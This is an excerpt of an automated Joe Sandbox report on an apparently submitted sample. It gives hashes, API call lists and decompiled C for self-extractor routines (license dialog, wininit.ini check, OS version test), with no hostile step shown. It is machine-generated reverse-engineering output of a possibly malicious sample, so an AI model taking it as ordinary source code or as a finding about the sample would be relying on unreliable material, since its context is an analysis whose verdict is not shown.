                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                      • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                      • API String ID: 3346862599-1109908249
                                                                                                                                                                                                      • Opcode ID: dac36b2270b76da918e012b1414684dcc687cc1ac5e5a433880d123cef3feda1
                                                                                                                                                                                                      • Instruction ID: 9cfefe347f1c9d5fb0217a232115c4f145c3f989b8d444353b1a4eb4236248ca
                                                                                                                                                                                                      • Opcode Fuzzy Hash: dac36b2270b76da918e012b1414684dcc687cc1ac5e5a433880d123cef3feda1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7316132A402189FDF31CB51DC45BAAB778FB55768F0402A5ED49B6240DB709E86CF92
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00A63A3F(void* __eflags) {
                                                                                                                                                                                                      				void* _t3;
                                                                                                                                                                                                      				void* _t9;
                                                                                                                                                                                                      				CHAR* _t16;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t16 = "LICENSE";
                                                                                                                                                                                                      				_t1 = E00A6468F(_t16, 0, 0) + 1; // 0x1
                                                                                                                                                                                                      				_t3 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                      				 *0xa68d4c = _t3;
                                                                                                                                                                                                      				if(_t3 != 0) {
                                                                                                                                                                                                      					_t19 = _t16;
                                                                                                                                                                                                      					if(E00A6468F(_t16, _t3, _t28) != 0) {
                                                                                                                                                                                                      						if(lstrcmpA( *0xa68d4c, "<None>") == 0) {
                                                                                                                                                                                                      							LocalFree( *0xa68d4c);
                                                                                                                                                                                                      							L9:
                                                                                                                                                                                                      							 *0xa69124 = 0;
                                                                                                                                                                                                      							return 1;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t9 = E00A66517(_t19, 0x7d1, 0, E00A63100, 0, 0);
                                                                                                                                                                                                      						LocalFree( *0xa68d4c);
                                                                                                                                                                                                      						if(_t9 != 0) {
                                                                                                                                                                                                      							goto L9;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						 *0xa69124 = 0x800704c7;
                                                                                                                                                                                                      						L2:
                                                                                                                                                                                                      						return 0;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					E00A644B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					LocalFree( *0xa68d4c);
                                                                                                                                                                                                      					 *0xa69124 = 0x80070714;
                                                                                                                                                                                                      					goto L2;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				E00A644B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                      				 *0xa69124 = E00A66285();
                                                                                                                                                                                                      				goto L2;
                                                                                                                                                                                                      			}







                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00A6468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A646A0
                                                                                                                                                                                                        • Part of subcall function 00A6468F: SizeofResource.KERNEL32(00000000,00000000,?,00A62D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646A9
                                                                                                                                                                                                        • Part of subcall function 00A6468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A646C3
                                                                                                                                                                                                        • Part of subcall function 00A6468F: LoadResource.KERNEL32(00000000,00000000,?,00A62D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646CC
                                                                                                                                                                                                        • Part of subcall function 00A6468F: LockResource.KERNEL32(00000000,?,00A62D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646D3
                                                                                                                                                                                                        • Part of subcall function 00A6468F: memcpy_s.MSVCRT ref: 00A646E5
                                                                                                                                                                                                        • Part of subcall function 00A6468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646EF
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00A62F64,?,00000002,00000000), ref: 00A63A5D
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00A63AB3
                                                                                                                                                                                                        • Part of subcall function 00A644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A64518
                                                                                                                                                                                                        • Part of subcall function 00A644B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00A64554
                                                                                                                                                                                                        • Part of subcall function 00A66285: GetLastError.KERNEL32(00A65BBC), ref: 00A66285
                                                                                                                                                                                                      • lstrcmpA.KERNEL32(<None>,00000000), ref: 00A63AD0
                                                                                                                                                                                                      • LocalFree.KERNEL32 ref: 00A63B13
                                                                                                                                                                                                        • Part of subcall function 00A66517: FindResourceA.KERNEL32(00A60000,000007D6,00000005), ref: 00A6652A
                                                                                                                                                                                                        • Part of subcall function 00A66517: LoadResource.KERNEL32(00A60000,00000000,?,?,00A62EE8,00000000,00A619E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00A66538
                                                                                                                                                                                                        • Part of subcall function 00A66517: DialogBoxIndirectParamA.USER32(00A60000,00000000,00000547,00A619E0,00000000), ref: 00A66557
                                                                                                                                                                                                        • Part of subcall function 00A66517: FreeResource.KERNEL32(00000000,?,?,00A62EE8,00000000,00A619E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00A66560
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,00A63100,00000000,00000000), ref: 00A63AF4
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                      • String ID: <None>$LICENSE
                                                                                                                                                                                                      • API String ID: 2414642746-383193767
                                                                                                                                                                                                      • Opcode ID: 8825c619f87114bdf014cce950713601b5e16be755e9b67f73c56cbabe4b5011
                                                                                                                                                                                                      • Instruction ID: 150e8a886c5dbfed70de38c804a50f4e5fcc0414c7e9c6a873a39b075a1174a9
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8825c619f87114bdf014cce950713601b5e16be755e9b67f73c56cbabe4b5011
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A6117871200101ABD760DBB29D09E1779BDDBE5740B10452DF545E61E1DFFA88029664
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                                                                      			E00A624E0(void* __ebx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t7;
                                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                                      				long _t26;
                                                                                                                                                                                                      				signed int _t27;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t20 = __ebx;
                                                                                                                                                                                                      				_t7 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				_v8 = _t7 ^ _t27;
                                                                                                                                                                                                      				_t25 = 0x104;
                                                                                                                                                                                                      				_t26 = 0;
                                                                                                                                                                                                      				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                      					E00A6658A( &_v268, 0x104, "wininit.ini");
                                                                                                                                                                                                      					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                                                                                                                                                      					_t25 = _lopen( &_v268, 0x40);
                                                                                                                                                                                                      					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                      						_t26 = _llseek(_t25, 0, 2);
                                                                                                                                                                                                      						_lclose(_t25);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E00A66CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                                                                                                                                                      			}












                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00A62506
                                                                                                                                                                                                      • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 00A6252C
                                                                                                                                                                                                      • _lopen.KERNEL32(?,00000040), ref: 00A6253B
                                                                                                                                                                                                      • _llseek.KERNEL32(00000000,00000000,00000002), ref: 00A6254C
                                                                                                                                                                                                      • _lclose.KERNEL32(00000000), ref: 00A62555
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                      • String ID: wininit.ini
                                                                                                                                                                                                      • API String ID: 3273605193-4206010578
                                                                                                                                                                                                      • Opcode ID: eb54c284f7eea86269f4d15603ac1b6680f25772f8532d675a54ae8ed124518e
                                                                                                                                                                                                      • Instruction ID: fffe82c9faf7b918268a78be51f58f235f45f80892fea449a6ddee78f5696afa
                                                                                                                                                                                                      • Opcode Fuzzy Hash: eb54c284f7eea86269f4d15603ac1b6680f25772f8532d675a54ae8ed124518e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1201B1326001286BC720EBA59D0DEDFBB7CEB95760F010165FA59E3190DEB48E46CBA1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 75%
                                                                                                                                                                                                      			E00A636EE(CHAR* __ecx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				struct _OSVERSIONINFOA _v416;
                                                                                                                                                                                                      				signed int _v420;
                                                                                                                                                                                                      				signed int _v424;
                                                                                                                                                                                                      				CHAR* _v428;
                                                                                                                                                                                                      				CHAR* _v432;
                                                                                                                                                                                                      				signed int _v436;
                                                                                                                                                                                                      				CHAR* _v440;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t72;
                                                                                                                                                                                                      				CHAR* _t77;
                                                                                                                                                                                                      				CHAR* _t91;
                                                                                                                                                                                                      				CHAR* _t94;
                                                                                                                                                                                                      				int _t97;
                                                                                                                                                                                                      				CHAR* _t98;
                                                                                                                                                                                                      				signed char _t99;
                                                                                                                                                                                                      				CHAR* _t104;
                                                                                                                                                                                                      				signed short _t107;
                                                                                                                                                                                                      				signed int _t109;
                                                                                                                                                                                                      				short _t113;
                                                                                                                                                                                                      				void* _t114;
                                                                                                                                                                                                      				signed char _t115;
                                                                                                                                                                                                      				short _t119;
                                                                                                                                                                                                      				CHAR* _t123;
                                                                                                                                                                                                      				CHAR* _t124;
                                                                                                                                                                                                      				CHAR* _t129;
                                                                                                                                                                                                      				signed int _t131;
                                                                                                                                                                                                      				signed int _t132;
                                                                                                                                                                                                      				CHAR* _t135;
                                                                                                                                                                                                      				CHAR* _t138;
                                                                                                                                                                                                      				signed int _t139;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t72 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				_v8 = _t72 ^ _t139;
                                                                                                                                                                                                      				_v416.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                      				_t115 = __ecx;
                                                                                                                                                                                                      				_t135 = 0;
                                                                                                                                                                                                      				_v432 = __ecx;
                                                                                                                                                                                                      				_t138 = 0;
                                                                                                                                                                                                      				if(GetVersionExA( &_v416) != 0) {
                                                                                                                                                                                                      					_t133 = _v416.dwMajorVersion;
                                                                                                                                                                                                      					_t119 = 2;
                                                                                                                                                                                                      					_t77 = _v416.dwPlatformId - 1;
                                                                                                                                                                                                      					__eflags = _t77;
                                                                                                                                                                                                      					if(_t77 == 0) {
                                                                                                                                                                                                      						_t119 = 0;
                                                                                                                                                                                                      						__eflags = 1;
                                                                                                                                                                                                      						 *0xa68184 = 1;
                                                                                                                                                                                                      						 *0xa68180 = 1;
                                                                                                                                                                                                      						L13:
                                                                                                                                                                                                      						 *0xa69a40 = _t119;
                                                                                                                                                                                                      						L14:
                                                                                                                                                                                                      						__eflags =  *0xa68a34 - _t138; // 0x0
                                                                                                                                                                                                      						if(__eflags != 0) {
                                                                                                                                                                                                      							goto L66;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						__eflags = _t115;
                                                                                                                                                                                                      						if(_t115 == 0) {
                                                                                                                                                                                                      							goto L66;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_v428 = _t135;
                                                                                                                                                                                                      						__eflags = _t119;
                                                                                                                                                                                                      						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                                                                                                                                                      						_t11 =  &_v420;
                                                                                                                                                                                                      						 *_t11 = _v420 & _t138;
                                                                                                                                                                                                      						__eflags =  *_t11;
                                                                                                                                                                                                      						_v440 = _t115;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_v424 = _t135 * 0x18;
                                                                                                                                                                                                      							_v436 = E00A62A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                                                                                                                                                      							_t91 = E00A62A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                                                                                                                                                      							_t123 = _v436;
                                                                                                                                                                                                      							_t133 = 0x54d;
							__eflags = _t123;
							if(_t123 < 0) {
								L32:
								__eflags = _v420 - 1;
								if(_v420 == 1) {
									_t138 = 0x54c;
									L36:
									__eflags = _t138;
									if(_t138 != 0) {
										L40:
										__eflags = _t138 - _t133;
										if(_t138 == _t133) {
											L30:
											_v420 = _v420 & 0x00000000;
											_t115 = 0;
											_v436 = _v436 & 0x00000000;
											__eflags = _t138 - _t133;
											_t133 = _v432;
											if(__eflags != 0) {
												_t124 = _v440;
											} else {
												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
												_v420 =  &_v268;
											}
											__eflags = _t124;
											if(_t124 == 0) {
												_t135 = _v436;
											} else {
												_t99 = _t124[0x30];
												_t135 = _t124[0x34] + 0x84 + _t133;
												__eflags = _t99 & 0x00000001;
												if((_t99 & 0x00000001) == 0) {
													asm("sbb ebx, ebx");
													_t115 =  ~(_t99 & 2) & 0x00000101;
												} else {
													_t115 = 0x104;
												}
											}
											__eflags =  *0xa68a38 & 0x00000001;
											if(( *0xa68a38 & 0x00000001) != 0) {
												L64:
												_push(0);
												_push(0x30);
												_push(_v420);
												_push("cent");
												goto L65;
											} else {
												__eflags = _t135;
												if(_t135 == 0) {
													goto L64;
												}
												__eflags =  *_t135;
												if( *_t135 == 0) {
													goto L64;
												}
												MessageBeep(0);
												_t94 = E00A6681F(_t115);
												__eflags = _t94;
												if(_t94 == 0) {
													L57:
													0x180030 = 0x30;
													L58:
													_t97 = MessageBoxA(0, _t135, "cent", 0x00180030 | _t115);
													__eflags = _t115 & 0x00000004;
													if((_t115 & 0x00000004) == 0) {
														__eflags = _t115 & 0x00000001;
														if((_t115 & 0x00000001) == 0) {
															goto L66;
														}
														__eflags = _t97 - 1;
														L62:
														if(__eflags == 0) {
															_t138 = 0;
														}
														goto L66;
													}
													__eflags = _t97 - 6;
													goto L62;
												}
												_t98 = E00A667C9(_t124, _t124);
												__eflags = _t98;
												if(_t98 == 0) {
													goto L57;
												}
												goto L58;
											}
										}
										__eflags = _t138 - 0x54c;
										if(_t138 == 0x54c) {
											goto L30;
										}
										__eflags = _t138;
										if(_t138 == 0) {
											goto L66;
										}
										_t135 = 0;
										__eflags = 0;
										goto L44;
									}
									L37:
									_t129 = _v432;
									__eflags = _t129[0x7c];
									if(_t129[0x7c] == 0) {
										goto L66;
									}
									_t133 =  &_v268;
									_t104 = E00A628E8(_t129,  &_v268, _t129,  &_v428);
									__eflags = _t104;
									if(_t104 != 0) {
										goto L66;
									}
									_t135 = _v428;
									_t133 = 0x54d;
									_t138 = 0x54d;
									goto L40;
								}
								goto L33;
							}
							__eflags = _t91;
							if(_t91 > 0) {
								goto L32;
							}
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t91;
								if(_t91 != 0) {
									goto L37;
								}
								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
								L27:
								if(__eflags <= 0) {
									goto L37;
								}
								L28:
								__eflags = _t135;
								if(_t135 == 0) {
									goto L33;
								}
								_t138 = 0x54c;
								goto L30;
							}
							__eflags = _t91;
							_t107 = _v416.dwBuildNumber;
							if(_t91 != 0) {
								_t131 = _v424;
								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
									goto L37;
								}
								goto L28;
							}
							_t132 = _t107 & 0x0000ffff;
							_t109 = _v424;
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
								goto L28;
							}
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
							goto L27;
							L33:
							_t135 =  &(_t135[1]);
							_v428 = _t135;
                                                                                                                                                                                                      							_v420 = _t135;
                                                                                                                                                                                                      							__eflags = _t135 - 2;
                                                                                                                                                                                                      						} while (_t135 < 2);
                                                                                                                                                                                                      						goto L36;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					__eflags = _t77 == 1;
                                                                                                                                                                                                      					if(_t77 == 1) {
                                                                                                                                                                                                      						 *0xa69a40 = _t119;
                                                                                                                                                                                                      						 *0xa68184 = 1;
                                                                                                                                                                                                      						 *0xa68180 = 1;
                                                                                                                                                                                                      						__eflags = _t133 - 3;
                                                                                                                                                                                                      						if(_t133 > 3) {
                                                                                                                                                                                                      							__eflags = _t133 - 5;
                                                                                                                                                                                                      							if(_t133 < 5) {
                                                                                                                                                                                                      								goto L14;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t113 = 3;
                                                                                                                                                                                                      							_t119 = _t113;
                                                                                                                                                                                                      							goto L13;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t119 = 1;
                                                                                                                                                                                                      						_t114 = 3;
                                                                                                                                                                                                      						 *0xa69a40 = 1;
                                                                                                                                                                                                      						__eflags = _t133 - _t114;
                                                                                                                                                                                                      						if(__eflags < 0) {
                                                                                                                                                                                                      							L9:
                                                                                                                                                                                                      							 *0xa68184 = _t135;
                                                                                                                                                                                                      							 *0xa68180 = _t135;
                                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						if(__eflags != 0) {
                                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						__eflags = _v416.dwMinorVersion - 0x33;
                                                                                                                                                                                                      						if(_v416.dwMinorVersion >= 0x33) {
                                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						goto L9;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t138 = 0x4ca;
                                                                                                                                                                                                      					goto L44;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t138 = 0x4b4;
                                                                                                                                                                                                      					L44:
                                                                                                                                                                                                      					_push(_t135);
                                                                                                                                                                                                      					_push(0x10);
                                                                                                                                                                                                      					_push(_t135);
                                                                                                                                                                                                      					_push(_t135);
                                                                                                                                                                                                      					L65:
                                                                                                                                                                                                      					_t133 = _t138;
                                                                                                                                                                                                      					E00A644B9(0, _t138);
                                                                                                                                                                                                      					L66:
                                                                                                                                                                                                      					return E00A66CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}





































                                                                                                                                                                                                      0x00a639c3
                                                                                                                                                                                                      0x00a639c9
                                                                                                                                                                                                      0x00a639ce
                                                                                                                                                                                                      0x00a639d0
                                                                                                                                                                                                      0x00a639e3
                                                                                                                                                                                                      0x00a639e5
                                                                                                                                                                                                      0x00a639e6
                                                                                                                                                                                                      0x00a639f1
                                                                                                                                                                                                      0x00a639f7
                                                                                                                                                                                                      0x00a639fa
                                                                                                                                                                                                      0x00a63a01
                                                                                                                                                                                                      0x00a63a04
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63a06
                                                                                                                                                                                                      0x00a63a09
                                                                                                                                                                                                      0x00a63a09
                                                                                                                                                                                                      0x00a63a0b
                                                                                                                                                                                                      0x00a63a0b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63a09
                                                                                                                                                                                                      0x00a639fc
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a639fc
                                                                                                                                                                                                      0x00a639d3
                                                                                                                                                                                                      0x00a639d8
                                                                                                                                                                                                      0x00a639da
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a639dc
                                                                                                                                                                                                      0x00a639b6
                                                                                                                                                                                                      0x00a63955
                                                                                                                                                                                                      0x00a6395b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63961
                                                                                                                                                                                                      0x00a63963
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63969
                                                                                                                                                                                                      0x00a63969
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63969
                                                                                                                                                                                                      0x00a63915
                                                                                                                                                                                                      0x00a63915
                                                                                                                                                                                                      0x00a6391b
                                                                                                                                                                                                      0x00a6391f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6392d
                                                                                                                                                                                                      0x00a63933
                                                                                                                                                                                                      0x00a63938
                                                                                                                                                                                                      0x00a6393a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63940
                                                                                                                                                                                                      0x00a63946
                                                                                                                                                                                                      0x00a6394b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6394b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a638f2
                                                                                                                                                                                                      0x00a63843
                                                                                                                                                                                                      0x00a63845
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6384b
                                                                                                                                                                                                      0x00a6384d
                                                                                                                                                                                                      0x00a63883
                                                                                                                                                                                                      0x00a63885
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6389a
                                                                                                                                                                                                      0x00a6389e
                                                                                                                                                                                                      0x00a6389e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a638a0
                                                                                                                                                                                                      0x00a638a0
                                                                                                                                                                                                      0x00a638a2
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a638a4
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a638a4
                                                                                                                                                                                                      0x00a6384f
                                                                                                                                                                                                      0x00a63851
                                                                                                                                                                                                      0x00a63857
                                                                                                                                                                                                      0x00a6386e
                                                                                                                                                                                                      0x00a63877
                                                                                                                                                                                                      0x00a6387b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63881
                                                                                                                                                                                                      0x00a63859
                                                                                                                                                                                                      0x00a6385c
                                                                                                                                                                                                      0x00a63862
                                                                                                                                                                                                      0x00a63866
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63868
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a638f4
                                                                                                                                                                                                      0x00a638f4
                                                                                                                                                                                                      0x00a638f5
                                                                                                                                                                                                      0x00a638fb
                                                                                                                                                                                                      0x00a63901
                                                                                                                                                                                                      0x00a63901
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6390a
                                                                                                                                                                                                      0x00a6374b
                                                                                                                                                                                                      0x00a6374e
                                                                                                                                                                                                      0x00a6375c
                                                                                                                                                                                                      0x00a63764
                                                                                                                                                                                                      0x00a63769
                                                                                                                                                                                                      0x00a6376e
                                                                                                                                                                                                      0x00a63771
                                                                                                                                                                                                      0x00a6379c
                                                                                                                                                                                                      0x00a6379f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a637a3
                                                                                                                                                                                                      0x00a637a4
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a637a4
                                                                                                                                                                                                      0x00a63773
                                                                                                                                                                                                      0x00a63777
                                                                                                                                                                                                      0x00a63778
                                                                                                                                                                                                      0x00a6377f
                                                                                                                                                                                                      0x00a63781
                                                                                                                                                                                                      0x00a6378e
                                                                                                                                                                                                      0x00a6378e

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00A63723
                                                                                                                                                                                                      • MessageBeep.USER32(00000000), ref: 00A639C3
                                                                                                                                                                                                      • MessageBoxA.USER32(00000000,00000000,cent,00000030), ref: 00A639F1
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Message$BeepVersion
                                                                                                                                                                                                      • String ID: 3$cent
                                                                                                                                                                                                      • API String ID: 2519184315-3438608206
                                                                                                                                                                                                      • Opcode ID: c232f1d1a8df4e71fbe99e50fb97335bb786665f5d95dcd4351893b49e54b4b2
                                                                                                                                                                                                      • Instruction ID: 1e8982303f3d5224a7fa869d4a7d612c8de8c2b610db22d916af75fbf10635ab
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c232f1d1a8df4e71fbe99e50fb97335bb786665f5d95dcd4351893b49e54b4b2
